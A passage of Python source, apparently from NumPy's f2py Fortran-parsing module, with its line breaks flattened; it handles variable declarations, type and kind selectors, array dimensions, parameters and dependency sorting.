cc: f = f - 1 elif c == ' ' and f == 1: l = l + '@_@' continue l = l + c cb = c return l def updatevars(typespec, selector, attrspec, entitydecl): global groupcache, groupcounter last_name = None kindselect, charselect, typename = cracktypespec(typespec, selector) if attrspec: attrspec = [x.strip() for x in markoutercomma(attrspec).split('@,@')] l = [] c = re.compile(r'(?P<start>[a-zA-Z]+)') for a in attrspec: if not a: continue m = c.match(a) if m: s = m.group('start').lower() a = s + a[len(s):] l.append(a) attrspec = l el = [x.strip() for x in markoutercomma(entitydecl).split('@,@')] el1 = [] for e in el: for e1 in [x.strip() for x in markoutercomma(removespaces(markinnerspaces(e)), comma=' ').split('@ @')]: if e1: el1.append(e1.replace('@_@', ' ')) for e in el1: m = namepattern.match(e) if not m: outmess( 'updatevars: no name pattern found for entity=%s. Skipping.\n' % (repr(e))) continue ename = rmbadname1(m.group('name')) edecl = {} if ename in groupcache[groupcounter]['vars']: edecl = groupcache[groupcounter]['vars'][ename].copy() not_has_typespec = 'typespec' not in edecl if not_has_typespec: edecl['typespec'] = typespec elif typespec and (not typespec == edecl['typespec']): outmess('updatevars: attempt to change the type of "%s" ("%s") to "%s". Ignoring.\n' % ( ename, edecl['typespec'], typespec)) if 'kindselector' not in edecl: edecl['kindselector'] = copy.copy(kindselect) elif kindselect: for k in list(kindselect.keys()): if k in edecl['kindselector'] and (not kindselect[k] == edecl['kindselector'][k]): outmess('updatevars: attempt to change the kindselector "%s" of "%s" ("%s") to "%s". Ignoring.\n' % ( k, ename, edecl['kindselector'][k], kindselect[k])) else: edecl['kindselector'][k] = copy.copy(kindselect[k]) if 'charselector' not in edecl and charselect: if not_has_typespec: edecl['charselector'] = charselect else: errmess('updatevars:%s: attempt to change empty charselector to %r. 
Ignoring.\n' % (ename, charselect)) elif charselect: for k in list(charselect.keys()): if k in edecl['charselector'] and (not charselect[k] == edecl['charselector'][k]): outmess('updatevars: attempt to change the charselector "%s" of "%s" ("%s") to "%s". Ignoring.\n' % ( k, ename, edecl['charselector'][k], charselect[k])) else: edecl['charselector'][k] = copy.copy(charselect[k]) if 'typename' not in edecl: edecl['typename'] = typename elif typename and (not edecl['typename'] == typename): outmess('updatevars: attempt to change the typename of "%s" ("%s") to "%s". Ignoring.\n' % ( ename, edecl['typename'], typename)) if 'attrspec' not in edecl: edecl['attrspec'] = copy.copy(attrspec) elif attrspec: for a in attrspec: if a not in edecl['attrspec']: edecl['attrspec'].append(a) else: edecl['typespec'] = copy.copy(typespec) edecl['kindselector'] = copy.copy(kindselect) edecl['charselector'] = copy.copy(charselect) edecl['typename'] = typename edecl['attrspec'] = copy.copy(attrspec) if m.group('after'): m1 = lenarraypattern.match(markouterparen(m.group('after'))) if m1: d1 = m1.groupdict() for lk in ['len', 'array', 'init']: if d1[lk + '2'] is not None: d1[lk] = d1[lk + '2'] del d1[lk + '2'] for k in list(d1.keys()): if d1[k] is not None: d1[k] = unmarkouterparen(d1[k]) else: del d1[k] if 'len' in d1 and 'array' in d1: if d1['len'] == '': d1['len'] = d1['array'] del d1['array'] else: d1['array'] = d1['array'] + ',' + d1['len'] del d1['len'] errmess('updatevars: "%s %s" is mapped to "%s %s(%s)"\n' % ( typespec, e, typespec, ename, d1['array'])) if 'array' in d1: dm = 'dimension(%s)' % d1['array'] if 'attrspec' not in edecl or (not edecl['attrspec']): edecl['attrspec'] = [dm] else: edecl['attrspec'].append(dm) for dm1 in edecl['attrspec']: if dm1[:9] == 'dimension' and dm1 != dm: del edecl['attrspec'][-1] errmess('updatevars:%s: attempt to change %r to %r. Ignoring.\n' % (ename, dm1, dm)) break if 'len' in d1: if typespec in ['complex', 'integer', 'logical', 'real']: if ('kindselector' not in edecl) or (not edecl['kindselector']): edecl['kindselector'] = {} edecl['kindselector']['*'] = d1['len'] elif typespec == 'character': if ('charselector' not in edecl) or (not edecl['charselector']): edecl['charselector'] = {} if 'len' in edecl['charselector']: del edecl['charselector']['len'] edecl['charselector']['*'] = d1['len'] if 'init' in d1: if '=' in edecl and (not edecl['='] == d1['init']): outmess('updatevars: attempt to change the init expression of "%s" ("%s") to "%s". Ignoring.\n' % ( ename, edecl['='], d1['init'])) else: edecl['='] = d1['init'] else: outmess('updatevars: could not crack entity declaration "%s". 
Ignoring.\n' % ( ename + m.group('after'))) for k in list(edecl.keys()): if not edecl[k]: del edecl[k] groupcache[groupcounter]['vars'][ename] = edecl if 'varnames' in groupcache[groupcounter]: groupcache[groupcounter]['varnames'].append(ename) last_name = ename return last_name def cracktypespec(typespec, selector): kindselect = None charselect = None typename = None if selector: if typespec in ['complex', 'integer', 'logical', 'real']: kindselect = kindselector.match(selector) if not kindselect: outmess( 'cracktypespec: no kindselector pattern found for %s\n' % (repr(selector))) return kindselect = kindselect.groupdict() kindselect['*'] = kindselect['kind2'] del kindselect['kind2'] for k in list(kindselect.keys()): if not kindselect[k]: del kindselect[k] for k, i in list(kindselect.items()): kindselect[k] = rmbadname1(i) elif typespec == 'character': charselect = charselector.match(selector) if not charselect: outmess( 'cracktypespec: no charselector pattern found for %s\n' % (repr(selector))) return charselect = charselect.groupdict() charselect['*'] = charselect['charlen'] del charselect['charlen'] if charselect['lenkind']: lenkind = lenkindpattern.match( markoutercomma(charselect['lenkind'])) lenkind = lenkind.groupdict() for lk in ['len', 'kind']: if lenkind[lk + '2']: lenkind[lk] = lenkind[lk + '2'] charselect[lk] = lenkind[lk] del lenkind[lk + '2'] del charselect['lenkind'] for k in list(charselect.keys()): if not charselect[k]: del charselect[k] for k, i in list(charselect.items()): charselect[k] = rmbadname1(i) elif typespec == 'type': typename = re.match(r'\s*\(\s*(?P<name>\w+)\s*\)', selector, re.I) if typename: typename = typename.group('name') else: outmess('cracktypespec: no typename found in %s\n' % (repr(typespec + selector))) else: outmess('cracktypespec: no selector used for %s\n' % (repr(selector))) return kindselect, charselect, typename ###### def setattrspec(decl, attr, force=0): if not decl: decl = {} if not attr: return decl if 'attrspec' not in decl: decl['attrspec'] = [attr] return decl if force: decl['attrspec'].append(attr) if attr in decl['attrspec']: return decl if attr == 'static' and 'automatic' not in decl['attrspec']: decl['attrspec'].append(attr) elif attr == 'automatic' and 'static' not in decl['attrspec']: decl['attrspec'].append(attr) elif attr == 'public': if 'private' not in decl['attrspec']: decl['attrspec'].append(attr) elif attr == 'private': if 'public' not in decl['attrspec']: decl['attrspec'].append(attr) else: decl['attrspec'].append(attr) return decl def setkindselector(decl, sel, force=0): if not decl: decl = {} if not sel: return decl if 'kindselector' not in decl: decl['kindselector'] = sel return decl for k in list(sel.keys()): if force or k not in decl['kindselector']: decl['kindselector'][k] = sel[k] return decl def setcharselector(decl, sel, force=0): if not decl: decl = {} if not sel: return decl if 'charselector' not in decl: decl['charselector'] = sel return decl for k in list(sel.keys()): if force or k not in decl['charselector']: decl['charselector'][k] = sel[k] return decl def getblockname(block, unknown='unknown'): if 'name' in block: return block['name'] return unknown # post processing def setmesstext(block): global filepositiontext try: filepositiontext = 'In: %s:%s\n' % (block['from'], block['name']) except Exception: pass def get_usedict(block): usedict = {} if 'parent_block' in block: usedict = get_usedict(block['parent_block']) if 'use' in block: usedict.update(block['use']) return usedict def get_useparameters(block, 
param_map=None): global f90modulevars if param_map is None: param_map = {} usedict = get_usedict(block) if not usedict: return param_map for usename, mapping in list(usedict.items()): usename = usename.lower() if usename not in f90modulevars: outmess('get_useparameters: no module %s info used by %s\n' % (usename, block.get('name'))) continue mvars = f90modulevars[usename] params = get_parameters(mvars) if not params: continue # XXX: apply mapping if mapping: errmess('get_useparameters: mapping for %s not impl.' % (mapping)) for k, v in list(params.items()): if k in param_map: outmess('get_useparameters: overriding parameter %s with' ' value from module %s' % (repr(k), repr(usename))) param_map[k] = v return param_map def postcrack2(block, tab='', param_map=None): global f90modulevars if not f90modulevars: return block if isinstance(block, list): ret = [postcrack2(g, tab=tab + '\t', param_map=param_map) for g in block] return ret setmesstext(block) outmess('%sBlock: %s\n' % (tab, block['name']), 0) if param_map is None: param_map = get_useparameters(block) if param_map is not None and 'vars' in block: vars = block['vars'] for n in list(vars.keys()): var = vars[n] if 'kindselector' in var: kind = var['kindselector'] if 'kind' in kind: val = kind['kind'] if val in param_map: kind['kind'] = param_map[val] new_body = [postcrack2(b, tab=tab + '\t', param_map=param_map) for b in block['body']] block['body'] = new_body return block def postcrack(block, args=None, tab=''): """ TODO: function return values determine expression types if in argument list """ global usermodules, onlyfunctions if isinstance(block, list): gret = [] uret = [] for g in block: setmesstext(g) g = postcrack(g, tab=tab + '\t') # sort user routines to appear first if 'name' in g and '__user__' in g['name']: uret.append(g) else: gret.append(g) return uret + gret setmesstext(block) if not isinstance(block, dict) and 'block' not in block: raise Exception('postcrack: Expected block dictionary instead of ' + str(block)) if 'name' in block and not block['name'] == 'unknown_interface': outmess('%sBlock: %s\n' % (tab, block['name']), 0) block = analyzeargs(block) block = analyzecommon(block) block['vars'] = analyzevars(block) block['sortvars'] = sortvarnames(block['vars']) if 'args' in block and block['args']: args = block['args'] block['body'] = analyzebody(block, args, tab=tab) userisdefined = [] if 'use' in block: useblock = block['use'] for k in list(useblock.keys()): if '__user__' in k: userisdefined.append(k) else: useblock = {} name = '' if 'name' in block: name = block['name'] # and not userisdefined: # Build a __user__ module if 'externals' in block and block['externals']: interfaced = [] if 'interfaced' in block: interfaced = block['interfaced'] mvars = copy.copy(block['vars']) if name: mname = name + '__user__routines' else: mname = 'unknown__user__routines' if mname in userisdefined: i = 1 while '%s_%i' % (mname, i) in userisdefined: i = i + 1 mname = '%s_%i' % (mname, i) interface = {'block': 'interface', 'body': [], 'vars': {}, 'name': name + '_user_interface'} for e in block['externals']: if e in interfaced: edef = [] j = -1 for b in block['body']: j = j + 1 if b['block'] == 'interface': i = -1 for bb in b['body']: i = i + 1 if 'name' in bb and bb['name'] == e: edef = copy.copy(bb) del b['body'][i] break if edef: if not b['body']: del block['body'][j] del interfaced[interfaced.index(e)] break interface['body'].append(edef) else: if e in mvars and not isexternal(mvars[e]): interface['vars'][e] = mvars[e] if 
interface['vars'] or interface['body']: block['interfaced'] = interfaced mblock = {'block': 'python module', 'body': [ interface], 'vars': {}, 'name': mname, 'interfaced': block['externals']} useblock[mname] = {} usermodules.append(mblock) if useblock: block['use'] = useblock return block def sortvarnames(vars): indep = [] dep = [] for v in list(vars.keys()): if 'depend' in vars[v] and vars[v]['depend']: dep.append(v) else: indep.append(v) n = len(dep) i = 0 while dep: # XXX: How to catch dependence cycles correctly? v = dep[0] fl = 0 for w in dep[1:]: if w in vars[v]['depend']: fl = 1 break if fl: dep = dep[1:] + [v] i = i + 1 if i > n: errmess('sortvarnames: failed to compute dependencies because' ' of cyclic dependencies between ' + ', '.join(dep) + '\n') indep = indep + dep break else: indep.append(v) dep = dep[1:] n = len(dep) i = 0 return indep def analyzecommon(block): if not hascommon(block): return block commonvars = [] for k in list(block['common'].keys()): comvars = [] for e in block['common'][k]: m = re.match( r'\A\s*\b(?P<name>.*?)\b\s*(\((?P<dims>.*?)\)|)\s*\Z', e, re.I) if m: dims = [] if m.group('dims'): dims = [x.strip() for x in markoutercomma(m.group('dims')).split('@,@')] n = rmbadname1(m.group('name').strip()) if n in block['vars']: if 'attrspec' in block['vars'][n]: block['vars'][n]['attrspec'].append( 'dimension(%s)' % (','.join(dims))) else: block['vars'][n]['attrspec'] = [ 'dimension(%s)' % (','.join(dims))] else: if dims: block['vars'][n] = { 'attrspec': ['dimension(%s)' % (','.join(dims))]} else: block['vars'][n] = {} if n not in commonvars: commonvars.append(n) else: n = e errmess( 'analyzecommon: failed to extract "<name>[(<dims>)]" from "%s" in common /%s/.\n' % (e, k)) comvars.append(n) block['common'][k] = comvars if 'commonvars' not in block: block['commonvars'] = commonvars else: block['commonvars'] = block['commonvars'] + commonvars return block def analyzebody(block, args, tab=''): global usermodules, skipfuncs, onlyfuncs, f90modulevars setmesstext(block) body = [] for b in block['body']: b['parent_block'] = block if b['block'] in ['function', 'subroutine']: if args is not None and b['name'] not in args: continue else: as_ = b['args'] if b['name'] in skipfuncs: continue if onlyfuncs and b['name'] not in onlyfuncs: continue b['saved_interface'] = crack2fortrangen( b, '\n' + ' ' * 6, as_interface=True) else: as_ = args b = postcrack(b, as_, tab=tab + '\t') if b['block'] == 'interface' and not b['body']: if 'f2pyenhancements' not in b: continue if b['block'].replace(' ', '') == 'pythonmodule': usermodules.append(b) else: if b['block'] == 'module': f90modulevars[b['name']] = b['vars'] body.append(b) return body def buildimplicitrules(block): setmesstext(block) implicitrules = defaultimplicitrules attrrules = {} if 'implicit' in block: if block['implicit'] is None: implicitrules = None if verbose > 1: outmess( 'buildimplicitrules: no implicit rules for routine %s.\n' % repr(block['name'])) else: for k in list(block['implicit'].keys()): if block['implicit'][k].get('typespec') not in ['static', 'automatic']: implicitrules[k] = block['implicit'][k] else: attrrules[k] = block['implicit'][k]['typespec'] return implicitrules, attrrules def myeval(e, g=None, l=None): """ Like `eval` but returns only integers and floats """ r = eval(e, g, l) if type(r) in [int, float]: return r raise ValueError('r=%r' % (r)) getlincoef_re_1 = re.compile(r'\A\b\w+\b\Z', re.I) def getlincoef(e, xset): # e = a*x+b ; x in xset """ Obtain ``a`` and ``b`` when ``e == "a*x+b"``, where ``x`` 
is a symbol in xset. >>> getlincoef('2*x + 1', {'x'}) (2, 1, 'x') >>> getlincoef('3*x + x*2 + 2 + 1', {'x'}) (5, 3, 'x') >>> getlincoef('0', {'x'}) (0, 0, None) >>> getlincoef('0*x', {'x'}) (0, 0, 'x') >>> getlincoef('x*x', {'x'}) (None, None, None) This can be tricked by sufficiently complex expressions >>> getlincoef('(x - 0.5)*(x - 1.5)*(x - 1)*x + 2*x + 3', {'x'}) (2.0, 3.0, 'x') """ try: c = int(myeval(e, {}, {})) return 0, c, None except Exception: pass if getlincoef_re_1.match(e): return 1, 0, e len_e = len(e) for x in xset: if len(x) > len_e: continue if re.search(r'\w\s*\([^)]*\b' + x + r'\b', e): # skip function calls having x as an argument, e.g max(1, x) continue re_1 = re.compile(r'(?P<before>.*?)\b' + x + r'\b(?P<after>.*)', re.I) m = re_1.match(e) if m: try: m1 = re_1.match(e) while m1: ee = '%s(%s)%s' % ( m1.group('before'), 0, m1.group('after')) m1 = re_1.match(ee) b = myeval(ee, {}, {}) m1 = re_1.match(e) while m1: ee = '%s(%s)%s' % ( m1.group('before'), 1, m1.group('after')) m1 = re_1.match(ee) a = myeval(ee, {}, {}) - b m1 = re_1.match(e) while m1: ee = '%s(%s)%s' % ( m1.group('before'), 0.5, m1.group('after')) m1 = re_1.match(ee) c = myeval(ee, {}, {}) # computing another point to be sure that expression is linear m1 = re_1.match(e) while m1: ee = '%s(%s)%s' % ( m1.group('before'), 1.5, m1.group('after')) m1 = re_1.match(ee) c2 = myeval(ee, {}, {}) if (a * 0.5 + b == c and a * 1.5 + b == c2): # gh-8062: return integers instead of floats if possible. try: a = int(a) except: pass try: b = int(b) except: pass return a, b, x except Exception: pass break return None, None, None _varname_match = re.compile(r'\A[a-z]\w*\Z').match def getarrlen(dl, args, star='*'): """ Parameters ---------- dl : sequence of two str objects dimensions of the array args : Iterable[str] symbols used in the expression star : Any unused Returns ------- expr : str Some numeric expression as a string arg : Optional[str] If understood, the argument from `args` present in `expr` expr2 : Optional[str] If understood, an expression fragment that should be used as ``"(%s%s".format(something, expr2)``. 
Examples -------- >>> getarrlen(['10*x + 20', '40*x'], {'x'}) ('30 * x - 19', 'x', '+19)/(30)') >>> getarrlen(['1', '10*x + 20'], {'x'}) ('10 * x + 20', 'x', '-20)/(10)') >>> getarrlen(['10*x + 20', '1'], {'x'}) ('-10 * x - 18', 'x', '+18)/(-10)') >>> getarrlen(['20', '1'], {'x'}) ('-18', None, None) """ edl = [] try: edl.append(myeval(dl[0], {}, {})) except Exception: edl.append(dl[0]) try: edl.append(myeval(dl[1], {}, {})) except Exception: edl.append(dl[1]) if isinstance(edl[0], int): p1 = 1 - edl[0] if p1 == 0: d = str(dl[1]) elif p1 < 0: d = '%s-%s' % (dl[1], -p1) else: d = '%s+%s' % (dl[1], p1) elif isinstance(edl[1], int): p1 = 1 + edl[1] if p1 == 0: d = '-(%s)' % (dl[0]) else: d = '%s-(%s)' % (p1, dl[0]) else: d = '%s-(%s)+1' % (dl[1], dl[0]) try: return repr(myeval(d, {}, {})), None, None except Exception: pass d1, d2 = getlincoef(dl[0], args), getlincoef(dl[1], args) if None not in [d1[0], d2[0]]: if (d1[0], d2[0]) == (0, 0): return repr(d2[1] - d1[1] + 1), None, None b = d2[1] - d1[1] + 1 d1 = (d1[0], 0, d1[2]) d2 = (d2[0], b, d2[2]) if d1[0] == 0 and d2[2] in args: if b < 0: return '%s * %s - %s' % (d2[0], d2[2], -b), d2[2], '+%s)/(%s)' % (-b, d2[0]) elif b: return '%s * %s + %s' % (d2[0], d2[2], b), d2[2], '-%s)/(%s)' % (b, d2[0]) else: return '%s * %s' % (d2[0], d2[2]), d2[2], ')/(%s)' % (d2[0]) if d2[0] == 0 and d1[2] in args: if b < 0: return '%s * %s - %s' % (-d1[0], d1[2], -b), d1[2], '+%s)/(%s)' % (-b, -d1[0]) elif b: return '%s * %s + %s' % (-d1[0], d1[2], b), d1[2], '-%s)/(%s)' % (b, -d1[0]) else: return '%s * %s' % (-d1[0], d1[2]), d1[2], ')/(%s)' % (-d1[0]) if d1[2] == d2[2] and d1[2] in args: a = d2[0] - d1[0] if not a: return repr(b), None, None if b < 0: return '%s * %s - %s' % (a, d1[2], -b), d2[2], '+%s)/(%s)' % (-b, a) elif b: return '%s * %s + %s' % (a, d1[2], b), d2[2], '-%s)/(%s)' % (b, a) else: return '%s * %s' % (a, d1[2]), d2[2], ')/(%s)' % (a) if d1[0] == d2[0] == 1: c = str(d1[2]) if c not in args: if _varname_match(c): outmess('\tgetarrlen:variable "%s" undefined\n' % (c)) c = '(%s)' % c if b == 0: d = '%s-%s' % (d2[2], c) elif b < 0: d = '%s-%s-%s' % (d2[2], c, -b) else: d = '%s-%s+%s' % (d2[2], c, b) elif d1[0] == 0: c2 = str(d2[2]) if c2 not in args: if _varname_match(c2): outmess('\tgetarrlen:variable "%s" undefined\n' % (c2)) c2 = '(%s)' % c2 if d2[0] == 1: pass elif d2[0] == -1: c2 = '-%s' % c2 else: c2 = '%s*%s' % (d2[0], c2) if b == 0: d = c2 elif b < 0: d = '%s-%s' % (c2, -b) else: d = '%s+%s' % (c2, b) elif d2[0] == 0: c1 = str(d1[2]) if c1 not in args: if _varname_match(c1): outmess('\tgetarrlen:variable "%s" undefined\n' % (c1)) c1 = '(%s)' % c1 if d1[0] == 1: c1 = '-%s' % c1 elif d1[0] == -1: c1 = '+%s' % c1 elif d1[0] < 0: c1 = '+%s*%s' % (-d1[0], c1) else: c1 = '-%s*%s' % (d1[0], c1) if b == 0: d = c1 elif b < 0: d = '%s-%s' % (c1, -b) else: d = '%s+%s' % (c1, b) else: c1 = str(d1[2]) if c1 not in args: if _varname_match(c1): outmess('\tgetarrlen:variable "%s" undefined\n' % (c1)) c1 = '(%s)' % c1 if d1[0] == 1: c1 = '-%s' % c1 elif d1[0] == -1: c1 = '+%s' % c1 elif d1[0] < 0: c1 = '+%s*%s' % (-d1[0], c1) else: c1 = '-%s*%s' % (d1[0], c1) c2 = str(d2[2]) if c2 not in args: if _varname_match(c2): outmess('\tgetarrlen:variable "%s" undefined\n' % (c2)) c2 = '(%s)' % c2 if d2[0] == 1: pass elif d2[0] == -1: c2 = '-%s' % c2 else: c2 = '%s*%s' % (d2[0], c2) if b == 0: d = '%s%s' % (c2, c1) elif b < 0: d = '%s%s-%s' % (c2, c1, -b) else: d = '%s%s+%s' % (c2, c1, b) return d, None, None word_pattern = re.compile(r'\b[a-z][\w$]*\b', re.I) def 
_get_depend_dict(name, vars, deps): if name in vars: words = vars[name].get('depend', []) if '=' in vars[name] and not isstring(vars[name]): for word in word_pattern.findall(vars[name]['=']): if word not in words and word in vars: words.append(word) for word in words[:]: for w in deps.get(word, []) \ or _get_depend_dict(word, vars, deps): if w not in words: words.append(w) else: outmess('_get_depend_dict: no dependence info for %s\n' % (repr(name))) words = [] deps[name] = words return words def _calc_depend_dict(vars): names = list(vars.keys()) depend_dict = {} for n in names: _get_depend_dict(n, vars, depend_dict) return depend_dict def get_sorted_names(vars): """ """ depend_dict = _calc_depend_dict(vars) names = [] for name in list(depend_dict.keys()): if not depend_dict[name]: names.append(name) del depend_dict[name] while depend_dict: for name, lst in list(depend_dict.items()): new_lst = [n for n in lst if n in depend_dict] if not new_lst: names.append(name) del depend_dict[name] else: depend_dict[name] = new_lst return [name for name in names if name in vars] def _kind_func(string): # XXX: return something sensible. if string[0] in "'\"": string = string[1:-1] if real16pattern.match(string): return 8 elif real8pattern.match(string): return 4 return 'kind(' + string + ')' def _selected_int_kind_func(r): # XXX: This should be processor dependent m = 10 ** r if m <= 2 ** 8: return 1 if m <= 2 ** 16: return 2 if m <= 2 ** 32: return 4 if m <= 2 ** 63: return 8 if m <= 2 ** 128: return 16 return -1 def _selected_real_kind_func(p, r=0, radix=0): # XXX: This should be processor dependent # This is only good for 0 <= p <= 20 if p < 7: return 4 if p < 16: return 8 machine = platform.machine().lower() if machine.startswith(('aarch64', 'power', 'ppc', 'riscv', 's390x', 'sparc')): if p <= 20: return 16 else: if p < 19: return 10 elif p <= 20: return 16 return -1 def get_parameters(vars, global_params={}): params = copy.copy(global_params) g_params = copy.copy(global_params) for name, func in [('kind', _kind_func), ('selected_int_kind', _selected_int_kind_func), ('selected_real_kind', _selected_real_kind_func), ]: if name not in g_params: g_params[name] = func param_names = [] for n in get_sorted_names(vars): if 'attrspec' in vars[n] and 'parameter' in vars[n]['attrspec']: param_names.append(n) kind_re = re.compile(r'\bkind\s*\(\s*(?P<value>.*)\s*\)', re.I) selected_int_kind_re = re.compile( r'\bselected_int_kind\s*\(\s*(?P<value>.*)\s*\)', re.I) selected_kind_re = re.compile( r'\bselected_(int|real)_kind\s*\(\s*(?P<value>.*)\s*\)', re.I) for n in param_names: if '=' in vars[n]: v = vars[n]['='] if islogical(vars[n]): v = v.lower() for repl in [ ('.false.', 'False'), ('.true.', 'True'), # TODO: test .eq., .neq., etc replacements. ]: v = v.replace(*repl) v = kind_re.sub(r'kind("\1")', v) v = selected_int_kind_re.sub(r'selected_int_kind(\1)', v) # We need to act according to the data. # The easy case is if the data has a kind-specifier, # then we may easily remove those specifiers. # However, it may be that the user uses other specifiers...(!) is_replaced = False if 'kindselector' in vars[n]: if 'kind' in vars[n]['kindselector']: orig_v_len = len(v) v = v.replace('_' + vars[n]['kindselector']['kind'], '') # Again, this will be true if even a single specifier # has been replaced, see comment above. 
is_replaced = len(v) < orig_v_len if not is_replaced: if not selected_kind_re.match(v): v_ = v.split('_') # In case there are additive parameters if len(v_) > 1: v = ''.join(v_[:-1]).lower().replace(v_[-1].lower(), '') # Currently this will not work for complex numbers. # There is missing code for extracting a complex number, # which may be defined in either of these: # a) (Re, Im) # b) cmplx(Re, Im) # c) dcmplx(Re, Im) # d) cmplx(Re, Im, <prec>) if isdouble(vars[n]): tt = list(v) for m in real16pattern.finditer(v): tt[m.start():m.end()] = list( v[m.start():m.end()].lower().replace('d', 'e')) v = ''.join(tt) elif iscomplex(vars[n]): # FIXME complex numbers may also have exponents if v[0] == '(' and v[-1] == ')': # FIXME, unused l looks like potential bug l = markoutercomma(v[1:-1]).split('@,@') try: params[n] = eval(v, g_params, params) except Exception as msg: params[n] = v outmess('get_parameters: got "%s" on %s\n' % (msg, repr(v))) if isstring(vars[n]) and isinstance(params[n], int): params[n] = chr(params[n]) nl = n.lower() if nl != n: params[nl] = params[n] else: print(vars[n]) outmess( 'get_parameters:parameter %s does not have value?!\n' % (repr(n))) return params def _eval_length(length, params): if length in ['(:)', '(*)', '*']: return '(*)' return _eval_scalar(length, params) _is_kind_number = re.compile(r'\d+_').match def _eval_scalar(value, params): if _is_kind_number(value): value = value.split('_')[0] try: value = str(eval(value, {}, params)) except (NameError, SyntaxError, TypeError): return value except Exception as msg: errmess('"%s" in evaluating %r ' '(available names: %s)\n' % (msg, value, list(params.keys()))) return value def analyzevars(block): global f90modulevars setmesstext(block) implicitrules, attrrules = buildimplicitrules(block) vars = copy.copy(block['vars']) if block['block'] == 'function' and block['name'] not in vars: vars[block['name']] = {} if '' in block['vars']: del vars[''] if 'attrspec' in block['vars']['']: gen = block['vars']['']['attrspec'] for n in list(vars.keys()): for k in ['public', 'private']: if k in gen: vars[n] = setattrspec(vars[n], k) svars = [] args = block['args'] for a in args: try: vars[a] svars.append(a) except KeyError: pass for n in list(vars.keys()): if n not in args: svars.append(n) params = get_parameters(vars, get_useparameters(block)) dep_matches = {} name_match = re.compile(r'\w[\w\d_$]*').match for v in list(vars.keys()): m = name_match(v) if m: n = v[m.start():m.end()] try: dep_matches[n] except KeyError: dep_matches[n] = re.compile(r'.*\b%s\b' % (v), re.I).match for n in svars: if n[0] in list(attrrules.keys()): vars[n] = setattrspec(vars[n], attrrules[n[0]]) if 'typespec' not in vars[n]: if not('attrspec' in vars[n] and 'external' in vars[n]['attrspec']): if implicitrules: ln0 = n[0].lower() for k in list(implicitrules[ln0].keys()): if k == 'typespec' and implicitrules[ln0][k] == 'undefined': continue if k not in vars[n]: vars[n][k] = implicitrules[ln0][k] elif k == 'attrspec': for l in implicitrules[ln0][k]: vars[n] = setattrspec(vars[n], l) elif n in block['args']: outmess('analyzevars: typespec of variable %s is not defined in routine %s.\n' % ( repr(n), block['name'])) if 'charselector' in vars[n]: if 'len' in vars[n]['charselector']: l = vars[n]['charselector']['len'] try: l = str(eval(l, {}, params)) except Exception: pass vars[n]['charselector']['len'] = l if 'kindselector' in vars[n]: if 'kind' in vars[n]['kindselector']: l = vars[n]['kindselector']['kind'] try: l = str(eval(l, {}, params)) except Exception: 
pass vars[n]['kindselector']['kind'] = l savelindims = {} if 'attrspec' in vars[n]: attr = vars[n]['attrspec'] attr.reverse() vars[n]['attrspec'] = [] dim, intent, depend, check, note = None, None, None, None, None for a in attr: if a[:9] == 'dimension': dim = (a[9:].strip())[1:-1] elif a[:6] == 'intent': intent = (a[6:].strip())[1:-1] elif a[:6] == 'depend': depend = (a[6:].strip())[1:-1] elif a[:5] == 'check': check = (a[5:].strip())[1:-1] elif a[:4] == 'note': note = (a[4:].strip())[1:-1] else: vars[n] = setattrspec(vars[n], a) if intent: if 'intent' not in vars[n]: vars[n]['intent'] = [] for c in [x.strip() for x in markoutercomma(intent).split('@,@')]: # Remove spaces so that 'in out' becomes 'inout' tmp = c.replace(' ', '') if tmp not in vars[n]['intent']: vars[n]['intent'].append(tmp) intent = None if note: note = note.replace('\\n\\n', '\n\n') note = note.replace('\\n ', '\n') if 'note' not in vars[n]: vars[n]['note'] = [note] else: vars[n]['note'].append(note) note = None if depend is not None: if 'depend' not in vars[n]: vars[n]['depend'] = [] for c in rmbadname([x.strip() for x in markoutercomma(depend).split('@,@')]): if c not in vars[n]['depend']: vars[n]['depend'].append(c) depend = None if check is not None: if 'check' not in vars[n]: vars[n]['check'] = [] for c in [x.strip() for x in markoutercomma(check).split('@,@')]: if c not in vars[n]['check']: vars[n]['check'].append(c) check = None if dim and 'dimension' not in vars[n]: vars[n]['dimension'] = [] for d in rmbadname([x.strip() for x in markoutercomma(dim).split('@,@')]): star = '*' if d == ':': star = ':' if d in params: d = str(params[d]) for p in list(params.keys()): re_1 = re.compile(r'(?P<before>.*?)\b' + p + r'\b(?P<after>.*)', re.I) m = re_1.match(d) while m: d = m.group('before') + \ str(params[p]) + m.group('after') m = re_1.match(d) if d == star: dl = [star] else: dl = markoutercomma(d, ':').split('@:@') if len(dl) == 2 and '*' in dl: # e.g. dimension(5:*) dl = ['*'] d = '*' if len(dl) == 1 and not dl[0] == star: dl = ['1', dl[0]] if len(dl) == 2: d, v, di = getarrlen(dl, list(block['vars'].keys())) if d[:4] == '1 * ': d = d[4:] if di and di[-4:] == '/(1)': di = di[:-4] if v: savelindims[d] = v, di vars[n]['dimension'].append(d) if 'dimension' in vars[n]: if isintent_c(vars[n]): shape_macro = 'shape' else: shape_macro = 'shape' # 'fshape' if isstringarray(vars[n]): if 'charselector' in vars[n]: d = vars[n]['charselector'] if '*' in d: d = d['*'] errmess('analyzevars: character array "character*%s %s(%s)" is considered as "character %s(%s)"; "intent(c)" is forced.\n' % (d, n, ','.join(vars[n]['dimension']), n, ','.join(vars[n]['dimension'] + [d]))) vars[n]['dimension'].append(d) del vars[n]['charselector'] if 'intent' not in vars[n]: vars[n]['intent'] = [] if 'c' not in vars[n]['intent']: vars[n]['intent'].append('c') else: errmess( "analyzevars: charselector=%r unhandled." 
% (d)) if 'check' not in vars[n] and 'args' in block and n in block['args']: flag = 'depend' not in vars[n] if flag: vars[n]['depend'] = [] vars[n]['check'] = [] if 'dimension' in vars[n]: #/----< no check i = -1 ni = len(vars[n]['dimension']) for d in vars[n]['dimension']: ddeps = [] # dependencies of 'd' ad = '' pd = '' if d not in vars: if d in savelindims: pd, ad = '(', savelindims[d][1] d = savelindims[d][0] else: for r in block['args']: if r not in vars: continue if re.match(r'.*?\b' + r + r'\b', d, re.I): ddeps.append(r) if d in vars: if 'attrspec' in vars[d]: for aa in vars[d]['attrspec']: if aa[:6] == 'depend': ddeps += aa[6:].strip()[1:-1].split(',') if 'depend' in vars[d]: ddeps = ddeps + vars[d]['depend'] i = i + 1 if d in vars and ('depend' not in vars[d]) \ and ('=' not in vars[d]) and (d not in vars[n]['depend']) \ and l_or(isintent_in, isintent_inout, isintent_inplace)(vars[n]): vars[d]['depend'] = [n] if ni > 1: vars[d]['='] = '%s%s(%s,%s)%s' % ( pd, shape_macro, n, i, ad) else: vars[d]['='] = '%slen(%s)%s' % (pd, n, ad) # /---< 